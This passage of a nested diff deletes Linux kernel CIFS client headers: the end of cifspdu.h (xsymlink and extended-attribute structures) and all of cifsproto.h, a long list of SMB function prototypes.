+-	of a number which is less than or equal to 1024,
+-   4) md5 must match that of the path data */
+-
+-struct xsymlink {
+-	/* 1067 bytes */
+-	char signature[4]; /* XSym */ /* not null terminated */
+-	char cr0;         /* \n */
+-/* ASCII representation of length (4 bytes decimal) terminated by \n not null */
+-	char length[4];
+-	char cr1;         /* \n */
+-/* md5 of valid subset of path ie path[0] through path[length-1] */
+-	__u8 md5[32];
+-	char cr2;        /* \n */
+-/* if room left, then end with \n then 0x20s by convention but not required */
+-	char path[1024];
+-} __attribute__((packed));
+-
+-typedef struct file_xattr_info {
+-	/* BB do we need another field for flags? BB */
+-	__u32 xattr_name_len;
+-	__u32 xattr_value_len;
+-	char  xattr_name[];
+-	/* followed by xattr_value[xattr_value_len], no pad */
+-} __attribute__((packed)) FILE_XATTR_INFO; /* extended attribute info
+-					      level 0x205 */
+-
+-/* flags for lsattr and chflags commands removed arein uapi/linux/fs.h */
+-
+-typedef struct file_chattr_info {
+-	__le64	mask; /* list of all possible attribute bits */
+-	__le64	mode; /* list of actual attribute bits on this inode */
+-} __attribute__((packed)) FILE_CHATTR_INFO;  /* ext attributes
+-						(chattr, chflags) level 0x206 */
+-#endif 				/* POSIX */
+-#endif				/* _CIFSPDU_H */
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+deleted file mode 100644
+index 98513f5af3f96..0000000000000
+--- a/fs/cifs/cifsproto.h
++++ /dev/null
+@@ -1,696 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#ifndef _CIFSPROTO_H
+-#define _CIFSPROTO_H
+-#include <linux/nls.h>
+-#include "trace.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-
+-struct statfs;
+-struct smb_rqst;
+-struct smb3_fs_context;
+-
+-/*
+- *****************************************************************
+- * All Prototypes
+- *****************************************************************
+- */
+-
+-extern struct smb_hdr *cifs_buf_get(void);
+-extern void cifs_buf_release(void *);
+-extern struct smb_hdr *cifs_small_buf_get(void);
+-extern void cifs_small_buf_release(void *);
+-extern void free_rsp_buf(int, void *);
+-extern int smb_send(struct TCP_Server_Info *, struct smb_hdr *,
+-			unsigned int /* length */);
+-extern unsigned int _get_xid(void);
+-extern void _free_xid(unsigned int);
+-#define get_xid()							\
+-({									\
+-	unsigned int __xid = _get_xid();				\
+-	cifs_dbg(FYI, "VFS: in %s as Xid: %u with uid: %d\n",		\
+-		 __func__, __xid,					\
+-		 from_kuid(&init_user_ns, current_fsuid()));		\
+-	trace_smb3_enter(__xid, __func__);				\
+-	__xid;								\
+-})
+-
+-#define free_xid(curr_xid)						\
+-do {									\
+-	_free_xid(curr_xid);						\
+-	cifs_dbg(FYI, "VFS: leaving %s (xid = %u) rc = %d\n",		\
+-		 __func__, curr_xid, (int)rc);				\
+-	if (rc)								\
+-		trace_smb3_exit_err(curr_xid, __func__, (int)rc);	\
+-	else								\
+-		trace_smb3_exit_done(curr_xid, __func__);		\
+-} while (0)
+-extern int init_cifs_idmap(void);
+-extern void exit_cifs_idmap(void);
+-extern int init_cifs_spnego(void);
+-extern void exit_cifs_spnego(void);
+-extern const char *build_path_from_dentry(struct dentry *, void *);
+-extern char *build_path_from_dentry_optional_prefix(struct dentry *direntry,
+-						    void *page, bool prefix);
+-static inline void *alloc_dentry_path(void)
+-{
+-	return __getname();
+-}
+-
+-static inline void free_dentry_path(void *page)
+-{
+-	if (page)
+-		__putname(page);
+-}
+-
+-extern char *cifs_build_path_to_root(struct smb3_fs_context *ctx,
+-				     struct cifs_sb_info *cifs_sb,
+-				     struct cifs_tcon *tcon,
+-				     int add_treename);
+-extern char *build_wildcard_path_from_dentry(struct dentry *direntry);
+-extern char *cifs_compose_mount_options(const char *sb_mountdata,
+-		const char *fullpath, const struct dfs_info3_param *ref,
+-		char **devname);
+-extern void delete_mid(struct mid_q_entry *mid);
+-extern void release_mid(struct mid_q_entry *mid);
+-extern void cifs_wake_up_task(struct mid_q_entry *mid);
+-extern int cifs_handle_standard(struct TCP_Server_Info *server,
+-				struct mid_q_entry *mid);
+-extern int smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx);
+-extern int smb3_parse_opt(const char *options, const char *key, char **val);
+-extern bool cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs);
+-extern int cifs_discard_remaining_data(struct TCP_Server_Info *server);
+-extern int cifs_call_async(struct TCP_Server_Info *server,
+-			struct smb_rqst *rqst,
+-			mid_receive_t *receive, mid_callback_t *callback,
+-			mid_handle_t *handle, void *cbdata, const int flags,
+-			const struct cifs_credits *exist_credits);
+-extern struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses);
+-extern int cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server,
+-			  struct smb_rqst *rqst, int *resp_buf_type,
+-			  const int flags, struct kvec *resp_iov);
+-extern int compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-			      struct TCP_Server_Info *server,
+-			      const int flags, const int num_rqst,
+-			      struct smb_rqst *rqst, int *resp_buf_type,
+-			      struct kvec *resp_iov);
+-extern int SendReceive(const unsigned int /* xid */ , struct cifs_ses *,
+-			struct smb_hdr * /* input */ ,
+-			struct smb_hdr * /* out */ ,
+-			int * /* bytes returned */ , const int);
+-extern int SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
+-			    char *in_buf, int flags);
+-extern struct mid_q_entry *cifs_setup_request(struct cifs_ses *,
+-				struct TCP_Server_Info *,
+-				struct smb_rqst *);
+-extern struct mid_q_entry *cifs_setup_async_request(struct TCP_Server_Info *,
+-						struct smb_rqst *);
+-extern int cifs_check_receive(struct mid_q_entry *mid,
+-			struct TCP_Server_Info *server, bool log_error);
+-extern int cifs_wait_mtu_credits(struct TCP_Server_Info *server,
+-				 unsigned int size, unsigned int *num,
+-				 struct cifs_credits *credits);
+-extern int SendReceive2(const unsigned int /* xid */ , struct cifs_ses *,
+-			struct kvec *, int /* nvec to send */,
+-			int * /* type of buf returned */, const int flags,
+-			struct kvec * /* resp vec */);
+-extern int SendReceiveBlockingLock(const unsigned int xid,
+-			struct cifs_tcon *ptcon,
+-			struct smb_hdr *in_buf ,
+-			struct smb_hdr *out_buf,
+-			int *bytes_returned);
+-void
+-cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+-				      bool all_channels);
+-void
+-cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+-				      bool mark_smb_session);
+-extern int cifs_reconnect(struct TCP_Server_Info *server,
+-			  bool mark_smb_session);
+-extern int checkSMB(char *buf, unsigned int len, struct TCP_Server_Info *srvr);
+-extern bool is_valid_oplock_break(char *, struct TCP_Server_Info *);
+-extern bool backup_cred(struct cifs_sb_info *);
+-extern bool is_size_safe_to_change(struct cifsInodeInfo *, __u64 eof);
+-extern void cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
+-			    unsigned int bytes_written);
+-extern struct cifsFileInfo *find_writable_file(struct cifsInodeInfo *, int);
+-extern int cifs_get_writable_file(struct cifsInodeInfo *cifs_inode,
+-				  int flags,
+-				  struct cifsFileInfo **ret_file);
+-extern int cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
+-				  int flags,
+-				  struct cifsFileInfo **ret_file);
+-extern struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *, bool);
+-extern int cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
+-				  struct cifsFileInfo **ret_file);
+-extern unsigned int smbCalcSize(void *buf);
+-extern int decode_negTokenInit(unsigned char *security_blob, int length,
+-			struct TCP_Server_Info *server);
+-extern int cifs_convert_address(struct sockaddr *dst, const char *src, int len);
+-extern void cifs_set_port(struct sockaddr *addr, const unsigned short int port);
+-extern int map_smb_to_linux_error(char *buf, bool logErr);
+-extern int map_and_check_smb_error(struct mid_q_entry *mid, bool logErr);
+-extern void header_assemble(struct smb_hdr *, char /* command */ ,
+-			    const struct cifs_tcon *, int /* length of
+-			    fixed section (word count) in two byte units */);
+-extern int small_smb_init_no_tc(const int smb_cmd, const int wct,
+-				struct cifs_ses *ses,
+-				void **request_buf);
+-extern enum securityEnum select_sectype(struct TCP_Server_Info *server,
+-				enum securityEnum requested);
+-extern int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server,
+-			  const struct nls_table *nls_cp);
+-extern struct timespec64 cifs_NTtimeToUnix(__le64 utc_nanoseconds_since_1601);
+-extern u64 cifs_UnixTimeToNT(struct timespec64);
+-extern struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time,
+-				      int offset);
+-extern void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock);
+-extern int cifs_get_writer(struct cifsInodeInfo *cinode);
+-extern void cifs_put_writer(struct cifsInodeInfo *cinode);
+-extern void cifs_done_oplock_break(struct cifsInodeInfo *cinode);
+-extern int cifs_unlock_range(struct cifsFileInfo *cfile,
+-			     struct file_lock *flock, const unsigned int xid);
+-extern int cifs_push_mandatory_locks(struct cifsFileInfo *cfile);
+-
+-extern void cifs_down_write(struct rw_semaphore *sem);
+-struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+-				       struct tcon_link *tlink, __u32 oplock,
+-				       const char *symlink_target);
+-extern int cifs_posix_open(const char *full_path, struct inode **inode,
+-			   struct super_block *sb, int mode,
+-			   unsigned int f_flags, __u32 *oplock, __u16 *netfid,
+-			   unsigned int xid);
+-void cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr);
+-extern void cifs_unix_basic_to_fattr(struct cifs_fattr *fattr,
+-				     FILE_UNIX_BASIC_INFO *info,
+-				     struct cifs_sb_info *cifs_sb);
+-extern void cifs_dir_info_to_fattr(struct cifs_fattr *, FILE_DIRECTORY_INFO *,
+-					struct cifs_sb_info *);
+-extern int cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr);
+-extern struct inode *cifs_iget(struct super_block *sb,
+-			       struct cifs_fattr *fattr);
+-
+-int cifs_get_inode_info(struct inode **inode, const char *full_path,
+-			struct cifs_open_info_data *data, struct super_block *sb, int xid,
+-			const struct cifs_fid *fid);
+-extern int smb311_posix_get_inode_info(struct inode **pinode, const char *search_path,
+-			struct super_block *sb, unsigned int xid);
+-extern int cifs_get_inode_info_unix(struct inode **pinode,
+-			const unsigned char *search_path,
+-			struct super_block *sb, unsigned int xid);
+-extern int cifs_set_file_info(struct inode *inode, struct iattr *attrs,
+-			      unsigned int xid, const char *full_path, __u32 dosattr);
+-extern int cifs_rename_pending_delete(const char *full_path,
+-				      struct dentry *dentry,
+-				      const unsigned int xid);
+-extern int sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
+-				struct cifs_fattr *fattr, uint sidtype);
+-extern int cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb,
+-			      struct cifs_fattr *fattr, struct inode *inode,
+-			      bool get_mode_from_special_sid,
+-			      const char *path, const struct cifs_fid *pfid);
+-extern int id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
+-					kuid_t uid, kgid_t gid);
+-extern struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *, struct inode *,
+-				      const char *, u32 *, u32);
+-extern struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *,
+-				const struct cifs_fid *, u32 *, u32);
+-extern int set_cifs_acl(struct cifs_ntsd *, __u32, struct inode *,
+-				const char *, int);
+-extern unsigned int setup_authusers_ACE(struct cifs_ace *pace);
+-extern unsigned int setup_special_mode_ACE(struct cifs_ace *pace, __u64 nmode);
+-extern unsigned int setup_special_user_owner_ACE(struct cifs_ace *pace);
+-
+-extern void dequeue_mid(struct mid_q_entry *mid, bool malformed);
+-extern int cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
+-			         unsigned int to_read);
+-extern ssize_t cifs_discard_from_socket(struct TCP_Server_Info *server,
+-					size_t to_read);
+-extern int cifs_read_page_from_socket(struct TCP_Server_Info *server,
+-					struct page *page,
+-					unsigned int page_offset,
+-					unsigned int to_read);
+-extern int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb);
+-extern int cifs_match_super(struct super_block *, void *);
+-extern int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx);
+-extern void cifs_umount(struct cifs_sb_info *);
+-extern void cifs_mark_open_files_invalid(struct cifs_tcon *tcon);
+-extern void cifs_reopen_persistent_handles(struct cifs_tcon *tcon);
+-
+-extern bool cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset,
+-				    __u64 length, __u8 type, __u16 flags,
+-				    struct cifsLockInfo **conf_lock,
+-				    int rw_check);
+-extern void cifs_add_pending_open(struct cifs_fid *fid,
+-				  struct tcon_link *tlink,
+-				  struct cifs_pending_open *open);
+-extern void cifs_add_pending_open_locked(struct cifs_fid *fid,
+-					 struct tcon_link *tlink,
+-					 struct cifs_pending_open *open);
+-extern void cifs_del_pending_open(struct cifs_pending_open *open);
+-
+-extern bool cifs_is_deferred_close(struct cifsFileInfo *cfile,
+-				struct cifs_deferred_close **dclose);
+-
+-extern void cifs_add_deferred_close(struct cifsFileInfo *cfile,
+-				struct cifs_deferred_close *dclose);
+-
+-extern void cifs_del_deferred_close(struct cifsFileInfo *cfile);
+-
+-extern void cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode);
+-
+-extern void cifs_close_all_deferred_files(struct cifs_tcon *cifs_tcon);
+-
+-extern void cifs_close_deferred_file_under_dentry(struct cifs_tcon *cifs_tcon,
+-				const char *path);
+-extern struct TCP_Server_Info *
+-cifs_get_tcp_session(struct smb3_fs_context *ctx,
+-		     struct TCP_Server_Info *primary_server);
+-extern void cifs_put_tcp_session(struct TCP_Server_Info *server,
+-				 int from_reconnect);
+-extern void cifs_put_tcon(struct cifs_tcon *tcon);
+-
+-#if IS_ENABLED(CONFIG_CIFS_DFS_UPCALL)
+-extern void cifs_dfs_release_automount_timer(void);
+-#else /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
+-#define cifs_dfs_release_automount_timer()	do { } while (0)
+-#endif /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
+-
+-void cifs_proc_init(void);
+-void cifs_proc_clean(void);
+-
+-extern void cifs_move_llist(struct list_head *source, struct list_head *dest);
+-extern void cifs_free_llist(struct list_head *llist);
+-extern void cifs_del_lock_waiters(struct cifsLockInfo *lock);
+-
+-extern int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon,
+-			     const struct nls_table *nlsc);
+-
+-extern int cifs_negotiate_protocol(const unsigned int xid,
+-				   struct cifs_ses *ses,
+-				   struct TCP_Server_Info *server);
+-extern int cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+-			      struct TCP_Server_Info *server,
+-			      struct nls_table *nls_info);
+-extern int cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required);
+-extern int CIFSSMBNegotiate(const unsigned int xid,
+-			    struct cifs_ses *ses,
+-			    struct TCP_Server_Info *server);
+-
+-extern int CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
+-		    const char *tree, struct cifs_tcon *tcon,
+-		    const struct nls_table *);
+-
+-extern int CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
+-		const char *searchName, struct cifs_sb_info *cifs_sb,
+-		__u16 *searchHandle, __u16 search_flags,
+-		struct cifs_search_info *psrch_inf,
+-		bool msearch);
+-
+-extern int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
+-		__u16 searchHandle, __u16 search_flags,
+-		struct cifs_search_info *psrch_inf);
+-
+-extern int CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
+-			const __u16 search_handle);
+-
+-extern int CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			u16 netfid, FILE_ALL_INFO *pFindData);
+-extern int CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			    const char *search_Name, FILE_ALL_INFO *data,
+-			    int legacy /* whether to use old info level */,
+-			    const struct nls_table *nls_codepage, int remap);
+-extern int SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
+-			       const char *search_name, FILE_ALL_INFO *data,
+-			       const struct nls_table *nls_codepage, int remap);
+-
+-extern int CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			u16 netfid, FILE_UNIX_BASIC_INFO *pFindData);
+-extern int CIFSSMBUnixQPathInfo(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const unsigned char *searchName,
+-			FILE_UNIX_BASIC_INFO *pFindData,
+-			const struct nls_table *nls_codepage, int remap);
+-
+-extern int CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+-			   const char *search_name,
+-			   struct dfs_info3_param **target_nodes,
+-			   unsigned int *num_of_nodes,
+-			   const struct nls_table *nls_codepage, int remap);
+-
+-extern int parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
+-			       unsigned int *num_of_nodes,
+-			       struct dfs_info3_param **target_nodes,
+-			       const struct nls_table *nls_codepage, int remap,
+-			       const char *searchName, bool is_unicode);
+-extern void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
+-				 struct cifs_sb_info *cifs_sb,
+-				 struct smb3_fs_context *ctx);
+-extern int CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct kstatfs *FSData);
+-extern int SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct kstatfs *FSData);
+-extern int CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			__u64 cap);
+-
+-extern int CIFSSMBQFSAttributeInfo(const unsigned int xid,
+-			struct cifs_tcon *tcon);
+-extern int CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct kstatfs *FSData);
+-
+-extern int CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *fileName, const FILE_BASIC_INFO *data,
+-			const struct nls_table *nls_codepage,
+-			struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			const FILE_BASIC_INFO *data, __u16 fid,
+-			__u32 pid_of_opener);
+-extern int CIFSSMBSetFileDisposition(const unsigned int xid,
+-				     struct cifs_tcon *tcon,
+-				     bool delete_file, __u16 fid,
+-				     __u32 pid_of_opener);
+-extern int CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
+-			 const char *file_name, __u64 size,
+-			 struct cifs_sb_info *cifs_sb, bool set_allocation);
+-extern int CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
+-			      struct cifsFileInfo *cfile, __u64 size,
+-			      bool set_allocation);
+-
+-struct cifs_unix_set_info_args {
+-	__u64	ctime;
+-	__u64	atime;
+-	__u64	mtime;
+-	__u64	mode;
+-	kuid_t	uid;
+-	kgid_t	gid;
+-	dev_t	device;
+-};
+-
+-extern int CIFSSMBUnixSetFileInfo(const unsigned int xid,
+-				  struct cifs_tcon *tcon,
+-				  const struct cifs_unix_set_info_args *args,
+-				  u16 fid, u32 pid_of_opener);
+-
+-extern int CIFSSMBUnixSetPathInfo(const unsigned int xid,
+-				  struct cifs_tcon *tcon, const char *file_name,
+-				  const struct cifs_unix_set_info_args *args,
+-				  const struct nls_table *nls_codepage,
+-				  int remap);
+-
+-extern int CIFSSMBMkDir(const unsigned int xid, struct inode *inode,
+-			umode_t mode, struct cifs_tcon *tcon,
+-			const char *name, struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *name, struct cifs_sb_info *cifs_sb);
+-extern int CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *name, __u16 type,
+-			const struct nls_table *nls_codepage,
+-			int remap_special_chars);
+-extern int CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon,
+-			  const char *name, struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
+-			 const char *from_name, const char *to_name,
+-			 struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *tcon,
+-				 int netfid, const char *target_name,
+-				 const struct nls_table *nls_codepage,
+-				 int remap_special_chars);
+-extern int CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
+-			      const char *from_name, const char *to_name,
+-			      struct cifs_sb_info *cifs_sb);
+-extern int CIFSUnixCreateHardLink(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const char *fromName, const char *toName,
+-			const struct nls_table *nls_codepage,
+-			int remap_special_chars);
+-extern int CIFSUnixCreateSymLink(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const char *fromName, const char *toName,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSSMBUnixQuerySymLink(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const unsigned char *searchName, char **syminfo,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-			       __u16 fid, char **symlinkinfo,
+-			       const struct nls_table *nls_codepage);
+-extern int CIFSSMB_set_compression(const unsigned int xid,
+-				   struct cifs_tcon *tcon, __u16 fid);
+-extern int CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms,
+-		     int *oplock, FILE_ALL_INFO *buf);
+-extern int SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *fileName, const int disposition,
+-			const int access_flags, const int omode,
+-			__u16 *netfid, int *pOplock, FILE_ALL_INFO *,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
+-			u32 posix_flags, __u64 mode, __u16 *netfid,
+-			FILE_UNIX_BASIC_INFO *pRetData,
+-			__u32 *pOplock, const char *name,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon,
+-			const int smb_file_id);
+-
+-extern int CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon,
+-			const int smb_file_id);
+-
+-extern int CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
+-			unsigned int *nbytes, char **buf,
+-			int *return_buf_type);
+-extern int CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
+-			unsigned int *nbytes, const char *buf);
+-extern int CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
+-			unsigned int *nbytes, struct kvec *iov, const int nvec);
+-extern int CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
+-				 const char *search_name, __u64 *inode_number,
+-				 const struct nls_table *nls_codepage,
+-				 int remap);
+-
+-extern int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const __u16 netfid, const __u8 lock_type,
+-		      const __u32 num_unlock, const __u32 num_lock,
+-		      LOCKING_ANDX_RANGE *buf);
+-extern int CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
+-			const __u16 netfid, const __u32 netpid, const __u64 len,
+-			const __u64 offset, const __u32 numUnlock,
+-			const __u32 numLock, const __u8 lockType,
+-			const bool waitFlag, const __u8 oplock_level);
+-extern int CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
+-			const __u16 smb_file_id, const __u32 netpid,
+-			const loff_t start_offset, const __u64 len,
+-			struct file_lock *, const __u16 lock_type,
+-			const bool waitFlag);
+-extern int CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int CIFSSMBEcho(struct TCP_Server_Info *server);
+-extern int CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses);
+-
+-extern struct cifs_ses *sesInfoAlloc(void);
+-extern void sesInfoFree(struct cifs_ses *);
+-extern struct cifs_tcon *tconInfoAlloc(void);
+-extern void tconInfoFree(struct cifs_tcon *);
+-
+-extern int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-		   __u32 *pexpected_response_sequence_number);
+-extern int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *,
+-			  __u32 *);
+-extern int cifs_sign_smb(struct smb_hdr *, struct TCP_Server_Info *, __u32 *);
+-extern int cifs_verify_signature(struct smb_rqst *rqst,
+-				 struct TCP_Server_Info *server,
+-				__u32 expected_sequence_number);
+-extern int setup_ntlmv2_rsp(struct cifs_ses *, const struct nls_table *);
+-extern void cifs_crypto_secmech_release(struct TCP_Server_Info *server);
+-extern int calc_seckey(struct cifs_ses *);
+-extern int generate_smb30signingkey(struct cifs_ses *ses,
+-				    struct TCP_Server_Info *server);
+-extern int generate_smb311signingkey(struct cifs_ses *ses,
+-				     struct TCP_Server_Info *server);
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-extern int CIFSSMBCopy(unsigned int xid,
+-			struct cifs_tcon *source_tcon,
+-			const char *fromName,
+-			const __u16 target_tid,
+-			const char *toName, const int flags,
+-			const struct nls_table *nls_codepage,
+-			int remap_special_chars);
+-extern ssize_t CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
+-			const unsigned char *searchName,
+-			const unsigned char *ea_name, char *EAData,
+-			size_t bufsize, struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
+-		const char *fileName, const char *ea_name,
+-		const void *ea_value, const __u16 ea_value_len,
+-		const struct nls_table *nls_codepage,
+-		struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon,
+-			__u16 fid, struct cifs_ntsd **acl_inf, __u32 *buflen);
+-extern int CIFSSMBSetCIFSACL(const unsigned int, struct cifs_tcon *, __u16,
+-			struct cifs_ntsd *, __u32, int);
+-extern int CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		const unsigned char *searchName,
+-		char *acl_inf, const int buflen, const int acl_type,
+-		const struct nls_table *nls_codepage, int remap_special_chars);
+-extern int CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		const unsigned char *fileName,
+-		const char *local_acl, const int buflen, const int acl_type,
+-		const struct nls_table *nls_codepage, int remap_special_chars);
+-extern int CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
+-			const int netfid, __u64 *pExtAttrBits, __u64 *pMask);
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-extern void cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb);
+-extern bool couldbe_mf_symlink(const struct cifs_fattr *fattr);
+-extern int check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			      struct cifs_sb_info *cifs_sb,
+-			      struct cifs_fattr *fattr,
+-			      const unsigned char *path);
+-extern int E_md4hash(const unsigned char *passwd, unsigned char *p16,
+-			const struct nls_table *codepage);
+-
+-extern int
+-cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname);
+-
+-extern struct TCP_Server_Info *
+-cifs_find_tcp_session(struct smb3_fs_context *ctx);
+-
+-extern void cifs_put_smb_ses(struct cifs_ses *ses);
+-
+-extern struct cifs_ses *
+-cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx);
+-
+-void cifs_readdata_release(struct kref *refcount);
+-int cifs_async_readv(struct cifs_readdata *rdata);
+-int cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid);
+-
+-int cifs_async_writev(struct cifs_writedata *wdata,
+-		      void (*release)(struct kref *kref));
+-void cifs_writev_complete(struct work_struct *work);
+-struct cifs_writedata *cifs_writedata_alloc(unsigned int nr_pages,
+-						work_func_t complete);
+-struct cifs_writedata *cifs_writedata_direct_alloc(struct page **pages,
+-						work_func_t complete);
+-void cifs_writedata_release(struct kref *refcount);
+-int cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			  struct cifs_sb_info *cifs_sb,
+-			  const unsigned char *path, char *pbuf,
+-			  unsigned int *pbytes_read);
+-int cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			   struct cifs_sb_info *cifs_sb,
+-			   const unsigned char *path, char *pbuf,
+-			   unsigned int *pbytes_written);
+-int __cifs_calc_signature(struct smb_rqst *rqst,
+-			struct TCP_Server_Info *server, char *signature,
+-			struct shash_desc *shash);
+-enum securityEnum cifs_select_sectype(struct TCP_Server_Info *,
+-					enum securityEnum);
+-struct cifs_aio_ctx *cifs_aio_ctx_alloc(void);
+-void cifs_aio_ctx_release(struct kref *refcount);
+-int setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw);
+-
+-int cifs_alloc_hash(const char *name, struct shash_desc **sdesc);
+-void cifs_free_hash(struct shash_desc **sdesc);
+-
+-void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
+-			  unsigned int *len, unsigned int *offset);
+-struct cifs_chan *
+-cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server);
+-int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses);
